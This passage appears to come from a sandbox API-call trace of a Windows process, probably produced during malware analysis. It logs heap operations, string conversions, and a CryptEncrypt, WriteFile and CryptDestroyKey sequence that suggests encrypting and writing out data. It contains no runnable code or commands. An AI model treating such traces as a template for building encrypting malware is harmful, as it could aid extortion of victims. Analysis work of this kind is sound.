0x2a5e800 [0215.410] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0215.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0215.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70e0 [0215.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0215.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0215.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0215.411] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0215.411] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0215.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0215.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0215.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0215.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0215.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71fe8 [0215.411] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0215.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0215.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab860 [0215.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0215.411] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71fe8 [0215.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0215.411] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0215.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0215.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0215.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0215.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0215.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0215.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0215.412] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0215.412] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0215.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0215.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0215.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0215.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0215.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0215.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0215.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0215.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0215.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0215.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0215.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0215.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0215.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0215.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0215.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0215.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0215.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0215.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc80 | out: hHeap=0x2af0000) returned 1 [0215.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0215.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0215.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0215.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8c9a0 | out: hHeap=0x2af0000) returned 1 [0215.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0215.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabad0 | out: hHeap=0x2af0000) returned 1 [0215.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc38 | out: hHeap=0x2af0000) returned 1 [0215.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0215.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0215.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbc0 | out: hHeap=0x2af0000) returned 1 [0215.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc50 | out: hHeap=0x2af0000) returned 1 [0215.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc38 | out: hHeap=0x2af0000) returned 1 [0215.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.414] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcc8 | out: hHeap=0x2af0000) returned 1 [0215.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0215.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc98 | out: hHeap=0x2af0000) returned 1 [0215.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0215.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabd28 | out: hHeap=0x2af0000) returned 1 [0215.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0215.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb78 | out: hHeap=0x2af0000) returned 1 [0215.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0215.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc98 | out: hHeap=0x2af0000) returned 1 [0215.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0215.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabae8 | out: hHeap=0x2af0000) returned 1 [0215.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0215.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcf8 | out: hHeap=0x2af0000) returned 1 [0215.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0215.415] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0215.415] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aabad0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0215.415] CryptEncrypt (in: hKey=0x9e2138, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x285b, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x2860) returned 1 [0215.415] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.415] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.415] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.415] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.415] CharLowerBuffW (in: lpsz="byte[10336]", cchLength=0xb | out: lpsz="byte[10336]") returned 0xb [0215.415] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.416] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.416] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.416] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.416] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.416] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.416] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.416] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.416] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0215.416] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aabc68, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0215.416] CryptEncrypt (in: hKey=0x9e2138, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a8c9a0*, pdwDataLen=0x8cef60*=0x285b, dwBufLen=0x2860 | out: pbData=0x2a8c9a0*, pdwDataLen=0x8cef60*=0x2860) returned 1 [0215.416] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.417] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.417] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.417] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.417] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.417] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.417] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.417] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0215.417] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.417] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0215.417] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.417] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.417] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0215.417] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.417] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0215.417] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.417] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.417] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.417] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.417] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0215.417] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.417] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0215.417] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.417] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.418] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.418] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.418] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.419] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.419] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.419] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.419] WriteFile (in: hFile=0x510, lpBuffer=0x3869888*, nNumberOfBytesToWrite=0x2860, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x3869888*, lpNumberOfBytesWritten=0x8cf5e4*=0x2860, lpOverlapped=0x0) returned 1 [0215.421] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.421] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.421] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0215.421] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0215.421] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0215.421] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0215.421] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0215.421] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.421] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0215.421] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.421] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0215.421] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0215.421] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0215.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab7b8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0215.421] CryptDestroyKey (hKey=0x9e2138) returned 1 [0215.421] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0215.421] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0215.421] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0215.421] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0215.421] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0215.421] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0215.422] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0215.422] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0215.422] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0215.422] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0215.422] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0215.422] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0215.422] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0215.422] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0215.422] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0215.422] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0215.422] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0215.422] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, 